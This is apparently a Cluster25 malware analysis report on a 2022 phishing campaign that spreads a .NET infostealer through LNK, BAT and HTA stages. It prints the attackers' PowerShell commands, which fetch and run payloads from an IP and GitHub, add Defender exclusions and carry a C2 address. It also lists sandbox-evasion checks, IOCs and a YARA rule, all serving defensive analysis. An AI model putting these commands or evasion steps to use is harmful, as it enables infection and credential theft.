By Cluster25 Threat Intel Team
December 22, 2022

image

 

Cluster25 researchers analyzed several campaigns (also publicly reported by CERT-AGID) that used phishing emails to spread an InfoStealer malware written in .NET through an infection chain that involves Windows Shortcut (LNK) files and Batch Scripts (BAT).  Taking into account the used TTPs and extracted evidence, the attacks seem perpetrated by the same adversary (internally named AUI001).

Even if the majority of the attacks seem to have impacted Italy, the network-based visibility over the malicious infrastructure C25 can dispose of about this event suggests similar implants impacted Germany and Turkey as well. More precisely Cluster25 observed around 100+ telemetry hits on Italy (with a single confirmed impacted entity operating in transportation sector) and a few dozen on Turkey and Germany (information is updated until Dec. 19, 2022, while the first hit on Italy has been registered on Dec. 06, 2022)

Some vendor refers to this event / actor as Alibaba2044 according to the name of a GitHub account used as one of the drop-points in the infection chain.

The final payload spread through the infection chain uses a complex level of obfuscation and packing techniques to hinder the analysis, that also makes difficult the attribution of the malware to a specific family. Some security firms identified it as the commercial infostealer known as PureLogs. As per  internal classification, the final payload overlapped with a .NET RAT / InfoStealer known as zgRAT.

The following report provides further details about the execution of the campaign, also giving more information about the threat actor’s TTPs and the observed samples.

INSIGHTS

The first stage of the attacks is executed through a phishing email that contains a malicious link that prompts the victim to download a .ZIP archive. Two of the analyzed attacks used the domains  dl[.]dropboxusercontent[.]com and downloadpdf-fattura[.]de as initial drop-points:

DROPS POINT
hxxps://dl[.]dropboxusercontent[.]com/s/52eq2p19vc0dcei/IT_Fattura_n99392.zip
https://downloadpdf-fattura[.]de/dpd/DOC9848-14-12-2022.zip

The ZIP is password protected (the password to extract its content is reported in the phishing email) and contain Windows Shortcut (LNK) files and Batch scripts (BAT). In one of the analyzed campaigns, a ZIP file contained the files named Fattura 06-12-2022.lnk and Fattura_IT9032003.bat.

The LNK executes the following PowerShell command, that downloads and executes an HTA file from a second drop-point. 

POWERSHELL
powershell.exe .  $env:C:\?i*\S*3?\m*ta.e*  ('http://116[.]203[.]19[.]97/1/lib32' + '.h' + 'ta')

The HTA file executes a PowerShell command that writes two files in the directory C:\ProgramData\. The first one has the filename image.png and contains an image of a fake invoice that is later opened and shown to the user as bait, similar to the following:

The second is the BAT file Fattura_IT9032003.bat, which has the same name and content of the one contained in the ZIP file. This one deobfuscates and executes the following command, which downloads another ZIP from GitHub:

POWERSHELL
(New-Object System.Net.WebClient).DownloadFile('https://github[.]com/NET-FrameWork-x64/NET/raw/main/NETFramework.zip','C:\Program Files\NETFramework.zip'); Expand-Archive 'C:\Program Files\NETFramework.zip' -DestinationPath 'C:\Program Files\'

The GitHub account used to download the second stage is named NET-FrameWork-x64, while the ZIP archive has the name NETFramework.zip and contains the executable file start.exe, which is a legit PowerShell executable that is later renamed and copied to the path C:\ProgramData\Fattura_IT9032003.bat.exe (the files attributes are also changed to make it hidden).

This file is used to run the following command, that downloads a third ZIP archive (wininfo64.zip) from another GitHub profile (alibaba2044), and finally decompresses it to obtain and run the executable file lib32.exe :

COMMAND
C:\Program Files\NETFramework\start.exe" Add-MpPreference -ExclusionPath C:\ -ExclusionExtension 'exe','zip' ; @('hxxps://github[.]com/alibaba2044/hauL2/raw/main/wininfo64.zip') | foreach{$fileName = $env:APPDATA + '/wininfo64.zip' ;(New-Object System.Net.WebClient).DownloadFile($_,$fileName);Expand-Archive -LiteralPath $fileName -DestinationPath $env:APPDATA;Invoke-Item $env:APPDATA\wininfo64\lib32.exe }

The BAT script, before completing its execution, deletes the PowerShell executable from the directory C:\ProgramData. The file lib32.exe is a malicious 64-bit PE executable written in Microsoft .NET. Cluster25 also observed other campaigns that spread the latter executable in a different way, with the help of a loader program that is responsible to unpack the malware and perform different kinds of anti-analysis techniques. 

To spread the loader the threat actor used a chain of phishing emails, LNK, BAT and CAB files (that may be used instead of the HTA file described above) similar to the one previously reported. At the end of the chain, a Microsoft .NET 64-bit PE (one sample showed the filename Solby.exe) is executed. The analysis of its code revealed a function named Array, in the class Trak, that deciphers a DLL file using a hardcoded key in memory and a XOR cycle.

The DLL, also written in .NET, is loaded using the method Load from the class Assembly and then a method with an obfuscated name is called in the loaded library. 

The malware also uses an anti-tampering protection mechanism, similar to the one performed by the open-source protector for .NET applications ConfuserEx: a method executed in .cctor, which is called before any other method in the DLL, is responsible to modify the code in order to correctly reconstruct the methods to be executed.

The reconstructed code also exploits another anti-analysis technique, consisting in the obfuscation mechanism performed through code-flattening. Moreover, the malware uses dynamic calls to the needed function using wrapper methods with random names.

The first called method in the DLL allocates an array of 188 bytes, that is then passed to the GZipStream function to decompress it, obtaining a Json file of 31 elements:

The entries of the Json file include the name of the original executable (Solby.exe) and the strings “Xtxcunvjl” (which will be used to create a Mutex) and “Itself”, which in other analyzed sample was substituted with “AppLaunch” (that will be used as executable name to launch a new malware process). The remaining elements are binary values, digits, null values and nested lists of similar elements.

The JSON file is passed to the JsonConvert.DeserializeObject method to deserialize it. The malware proceeds by performing an evasion technique similar to the one observed in other malware as IceXLoader: it retrieves the host and the user names to check if it is running in an Windows Defender emulator, where the mentioned values are respectively "hal9th” and "johndoe”.

The latter string values are encrypted in the binary and used after a loop of different operations, including XORs and shifts.

Similarly, this happens for the string "start-sleep -seconds {0}”, which is then encoded in base64 and used to start a new process with PowerShell. The resulting command that is executed is the following, which just suspends the execution of PowerShell for 37 seconds:

POWERSHELL
powershell.exe -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA3AA==

Then, another anti-analysis check is performed by decrypting the string "SbieDll.dll”, which is the name of the Sandboxie User Mode DLL, and by iterating through the process modules to check if it is loaded in order to discover if the malicious program is being analyzed.

If this is not the case, the malware proceeds making a query using the ManagementObjectSearcher and the decrypted string "select * from Win32_BIOS”, where the value of the “Version” substring is selected. The malware also retrieves the serial number of the infected system, which is then concatenated with the version value to form a new string.

The latter is checked against the decrypted string "VMware|VIRTUAL|A M I|Xen” to find a possible match which would reveal the execution of the malware under a virtualized environment.

A second check is performed by executing another query after decrypting the strings  "select * from Win32_ComputerSystem”, “manufacturer” and “Virtual Machine”, and the result of the query is matched against the string "Microsoft|VMWare|Virtual”. A third Anti-VM check involves the checking of the display resolution size.

If the checks reveal the execution under a virtual environment,  the malware decrypts the strings "Start-Sleep -s 10; Remove-Item -Path \"” and “-Force”. The string are concatenated with the path of the current process and encoded in base64 to build a PowerShell command that deletes the executable file.

Otherwise, if the checks fail, the malware continues its execution creating a Mutex using one of the strings contained in the configuration for its name (e.g. "Xtxcunvjl”). 

At this point it verifies if the file AppLaunch.exe exists at the path C:\Windows\Microsoft.NET\Framework64\v4.0.30319\. If the file exists, the malware creates a suspended process launching the executable, otherwise it creates a suspended process launching a new copy of itself. In the new process the malware injects an executable that is unpacked from its memory, which the analysis revealed to be the same kind of malware seen in the previously mentioned infection chain (i.e. the sample named lib32.exe).

The injected executable decompresses a stream of data containing another executable, calling a method named Football. Other methods used in the code also reveal names generated from random words, like Pool, Soccer, Street, Football (or in other cases they contain totally random sequences of characters). 

The stream of data to be decompressed is stored in a resource of the executable named Ejefqnxog, retrieved through the method GetArray of the class Sport. Then, the obtained stream containing the second executable is passed to the method Soccer, where the Type object x9saOOgv3rSC1hZcTw.nvjp2iygSxrT1r7lBk is retrieved.

Finally, the method Street invokes the method yWIKu234nin from the newly retrieved class. One of the first dynamic methods to be called is the function GetCurrentDomain to get the context of execution, then the malware calls a function to decode the following base64 string:

BASE64
UAAAAB+LCAAAAAAABACL8uPiM7Q01TMyMNQzMtYzMjQQQuNL3NFWUjBOsjQwTTYzNE1KNk5NNbFMS04yTDK1SDZMTDQ2sTQ202J3SU1LLM0pAQD5FrqQUAAAAA==

The string, once decoded, is decompressed using the GZipStream object and the result is later deserialized.

The deserialized object contains the malware configuration, which includes  the IP addresses 195[.]201[.]23[.]210 and the TCP port 5596 (hex: {0x000015DC}). Other samples showed the usage of different TCP ports (e.g. 5699) while maintaining the same IP address. 

The configuration also contains the strings Default and 3b905c615bc3ee49fcb1b58c1aa34936. The latter string is used with the password-based key derivation function Rfc2898DeriveBytes.

The malware finally tries the connection to the Command-and-Control (C2) server. It also defines asynchronous functions to be called when inputs are received from the C2 server. The main malware thread, instead, continues its execution by entering into a cycle of Sleep functions. From this point on, the malware communicates with the C2 server acting as a pure information stealer. The information that could be retrieved from the victim regards data from browsers (e.g. Passwords, Cookies, History), crypto wallets and applications (e.g. FileZilla, Outlook, Thunderbird).

 

CONCLUSIONS

An Information Stealer is a particular piece of malware designed to gather information from a system. Such information is often a generous source of revenue for cybercriminals. In fact, the stolen information feeds a complex criminal ecosystem in which it could be used for multiple illegal activities and/or used as initial access for a cyber attack. Like other malware families, infostealers are continually evolving to become increasingly stealthy and undetectable.

 

MITRE ATT&CK MATRIX

TACTIC TECHNIQUE DESCRIPTION
Initial Access T1566.002 Phishing: Spearphishing Link
Execution T1059.001 Command and Scripting Interpreter: PowerShell
Execution T1059.003 Command and Scripting Interpreter: Windows Command Shell
Execution T1204.001 User Execution: Malicious Link

Execution

T1204.002

User Execution: Malicious File

Defense Evasion T1140 Deobfuscate/Decode Files or Information
Defense Evasion T1564.001 Hide Artifacts: Hidden Files and Directories
Defense Evasion T1497.001 Virtualization/Sandbox Evasion: System Checks
Defense Evasion T1070.004 Indicator Removal: File Deletion
Defense Evasion T1027 Obfuscated Files or Information
Defense Evasion T1055.002 Process Injection: Portable Executable Injection
Discovery T1082 System Information Discovery

  Discovery 

  T1083   File and Directory Discovery

  Discovery 

  T1518.001   Software Discovery: Security Software Discovery

  Discovery

  T1105   System Owner/User Discovery
  Command & Control   T1071.001   Ingress Tool Transfer
  Command & Control   T1071   Application Layer Protocol
  Exfiltration   T1041   Exfiltration Over C2 Channel

 

INDICATORS OF COMPROMISE

CATEGORY TYPE VALUE
  PAYLOAD SHA256 2681a33478967ac0953785eac5f3b924c5159b6137ae96a619943c8dd1c8131b
  PAYLOAD SHA256 048159f1f7f087ed7704a7035cdcb8555ccb864e468a452e69c2d02864eb2ea1
  PAYLOAD SHA256 703fc33e07203b936f2cb2e24ee2ba40c1f07a998210617d16d511fcc0e207db
  PAYLOAD SHA256 32312ed6fc1968c041c331c74760d465897b28ccd939749949d07c23df063823
  PAYLOAD SHA256 ccfa2a59f817a699433738eb52fef5e6aa236051fa68d6709e7b8a2c576c3de1
  PAYLOAD SHA256 8d4ed7017342c8b737b13f98b95956a5f3d2b2fcfbb921661d93a2c48a916911
  PAYLOAD SHA256 d3aa8fca03e9eb9911bbb51302d703afa9c04ce94d94ce6c3cd5086999e49471
  PAYLOAD SHA256 752a84ba60cc53ec23642402ff87c1eee074ca6ae7703bec7b1ef9e600f63e9a
  PAYLOAD SHA256 32312ed6fc1968c041c331c74760d465897b28ccd939749949d07c23df063823
  PAYLOAD SHA256 cbe92ec74d77f6524ddd4836b378b6e721db8f04f6d5f9df2a131d145d4f5bb8
  PAYLOAD SHA256 a843517b019e86af42252b568e06dfe91a22f9034ceb996f5b0df32dcc1e4274
  PAYLOAD SHA256 6386dd85be2a3bd3529e8524c26cad7c4e8682f7dfcc25792a8db8f5d5d9528a
  PAYLOAD SHA256 048159f1f7f087ed7704a7035cdcb8555ccb864e468a452e69c2d02864eb2ea1
  NETWORK DOMAIN downloadpdf-fattura[.]de
  NETWORK HOSTNAME
utente[.]service-fatturecloud[.]de
  NETWORK DOMAIN
service-fatturecloud[.]de
  NETWORK IPv4 116[.]203[.]19[.]97
  NETWORK IPv4 195[.]201[.]23[.]210 
  NETWORK URL http://raw[.]githubusercontent[.]com/alibaba2044/haul2/main/wininfo64.zip
  NETWORK URL hxxps://dl[.]dropboxusercontent[.]com/s/52eq2p19vc0dcei/IT_Fattura_n99392.zip
  NETWORK URL https://downloadpdf-fattura[.]de/dpd/DOC9848-14-12-2022.zip

 

THREAT HUNTING AND DETECTION

YARA
rule AUI001_InfoStealer_85233_98005 {
meta:
author = "Cluster25"
description = "Detects final-stage payload of AUI001 InfoStealer RAT"
tlp = "white"
score = 100
strings:
$r1 = "Pool" fullword ascii
$r2 = "Soccer" fullword ascii
$r3 = "Street" fullword ascii
$r4 = "Football" fullword ascii
$g1 = "GZipStream" fullword ascii
$f1 = "get_Module" fullword ascii
$f2 = "Reverse" fullword ascii
$f3 = "BlockCopy" fullword ascii
$f4 = "ReadByte" fullword ascii
$s1 = "{11111-22222-10009-11112}" fullword wide
$s2 = "{11111-22222-50001-00000}" fullword wide
$s3 = { 4c 00 6f 00 63 00 61 00 74 00 69 00 6f 00 6e 00
00 0b 46 00 69 00 6e 00 64 00 20 00 00 13 52 00
65 00 73 00 6f 00 75 00 72 00 63 00 65 00 41 00
00 11 56 00 69 00 72 00 74 00 75 00 61 00 6c 00
20 00 00 0b 41 00 6c 00 6c 00 6f 00 63 00 00 0d
57 00 72 00 69 00 74 00 65 00 20 00 00 11 50 00
72 00 6f 00 63 00 65 00 73 00 73 00 20 00 00 0d
4d 00 65 00 6d 00 6f 00 72 00 79 00 00 0f 50 00
72 00 6f 00 74 00 65 00 63 00 74 00 00 0b 4f 00
70 00 65 00 6e 00 20 00 00 0f 50 00 72 00 6f 00
63 00 65 00 73 00 73 00 00 0d 43 00 6c 00 6f 00
73 00 65 00 20 00 00 0d 48 00 61 00 6e 00 64 00
6c 00 65 00 00 0f 6b 00 65 00 72 00 6e 00 65 00
6c 00 20 00 00 0d 33 00 32 00 2e 00 64 00 6c 00
6c }
condition:
uint16(0) == 0x5a4d and
$g1 and
(all of ($r*) or
(all of ($f*) and
2 of ($s*) ))
}

 

You may also like

Ghostwriter / UNC1151 Adopts Microbackdoor Variants in Cyber Operations Against Ukraine
Ghostwriter / UNC1151 Adopts Microbackdoor Variants in Cyber Operations Against Ukraine
March 8, 2022

For a few months Cluster25 collected and analyzed several malicious activities which then were internally linked with th...

The Duck is Hiring in Italy: DUCKTAIL Spread via Compromised LinkedIn Profiles
The Duck is Hiring in Italy: DUCKTAIL Spread via Compromised LinkedIn Profiles
October 25, 2023

Cluster25 observed a malicious campaign that employs LinkedIn messages as a vector for executing identity theft attacks....